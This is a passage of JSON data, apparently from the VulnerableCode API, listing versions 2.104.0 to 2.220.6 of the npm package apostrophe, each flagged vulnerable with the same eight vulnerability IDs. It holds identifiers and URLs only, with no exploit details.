y":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.104.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539440?format=json","purl":"pkg:npm/apostrophe@2.105.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.105.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539441?format=json","purl":"pkg:npm/apostrophe@2.105.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.105.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539442?format=json","purl":"pkg:npm/apostrophe@2.105.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.105.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539443?format=json","purl":"pkg:npm/apostrophe@2.106.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.106.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539444?format=json","purl":"pkg:npm/apostrophe@2.106.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.106.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539445?format=json","purl":"pkg:npm/apostrophe@2.106.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.106.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539446?format=json","purl":"pkg:npm/apostrophe@2.106.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.106.3"},{"url":"http://public2.vulnerablecode.io/api/packages/539447?format=json","purl":"pkg:npm/apostrophe@2.107.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.107.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539448?format=json","purl":"pkg:npm/apostrophe@2.107.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.107.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539449?format=json","purl":"pkg:npm/apostrophe@2.107.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.107.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539450?format=json","purl":"pkg:npm/apostrophe@2.108.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.108.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539451?format=json","purl":"pkg:npm/apostrophe@2.108.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.108.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539452?format=json","purl":"pkg:npm/apostrophe@2.109.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.109.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539453?format=json","purl":"pkg:npm/apostrophe@2.110.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.110.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539454?format=json","purl":"pkg:npm/apostrophe@2.111.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.111.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539455?format=json","purl":"pkg:npm/apostrophe@2.111.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.111.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539456?format=json","purl":"pkg:npm/apostrophe@2.111.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.111.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539457?format=json","purl":"pkg:npm/apostrophe@2.111.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.111.3"},{"url":"http://public2.vulnerablecode.io/api/packages/539458?format=json","purl":"pkg:npm/apostrophe@2.111.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.111.4"},{"url":"http://public2.vulnerablecode.io/api/packages/539459?format=json","purl":"pkg:npm/apostrophe@2.111.5-alpha.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.111.5-alpha.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539460?format=json","purl":"pkg:npm/apostrophe@2.112.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.112.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539461?format=json","purl":"pkg:npm/apostrophe@2.112.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.112.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539462?format=json","purl":"pkg:npm/apostrophe@2.113.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.113.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539463?format=json","purl":"pkg:npm/apostrophe@2.113.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.113.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539464?format=json","purl":"pkg:npm/apostrophe@2.113.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.113.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539465?format=json","purl":"pkg:npm/apostrophe@2.113.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.113.3"},{"url":"http://public2.vulnerablecode.io/api/packages/539466?format=json","purl":"pkg:npm/apostrophe@2.114.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.114.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539467?format=json","purl":"pkg:npm/apostrophe@2.115.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.115.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539468?format=json","purl":"pkg:npm/apostrophe@2.115.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.115.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539469?format=json","purl":"pkg:npm/apostrophe@2.116.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.116.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539470?format=json","purl":"pkg:npm/apostrophe@2.116.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.116.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539471?format=json","purl":"pkg:npm/apostrophe@2.117.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.117.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539472?format=json","purl":"pkg:npm/apostrophe@2.117.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.117.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539473?format=json","purl":"pkg:npm/apostrophe@2.118.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.118.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539474?format=json","purl":"pkg:npm/apostrophe@2.119.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.119.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539475?format=json","purl":"pkg:npm/apostrophe@2.119.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.119.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539476?format=json","purl":"pkg:npm/apostrophe@2.220.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.220.0"},{"url":"http://public2.vulnerablecode.io/api/packages/539477?format=json","purl":"pkg:npm/apostrophe@2.220.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.220.1"},{"url":"http://public2.vulnerablecode.io/api/packages/539478?format=json","purl":"pkg:npm/apostrophe@2.220.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.220.2"},{"url":"http://public2.vulnerablecode.io/api/packages/539479?format=json","purl":"pkg:npm/apostrophe@2.220.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.220.3"},{"url":"http://public2.vulnerablecode.io/api/packages/539480?format=json","purl":"pkg:npm/apostrophe@2.220.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.220.4"},{"url":"http://public2.vulnerablecode.io/api/packages/539481?format=json","purl":"pkg:npm/apostrophe@2.220.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@2.220.5"},{"url":"http://public2.vulnerablecode.io/api/packages/539482?format=json","purl":"pkg:npm/apostrophe@2.220.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-82j4-a56g-3kbq"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-dsd6-hfud-ekfs"},{"vulnerability":"VCID-ewtn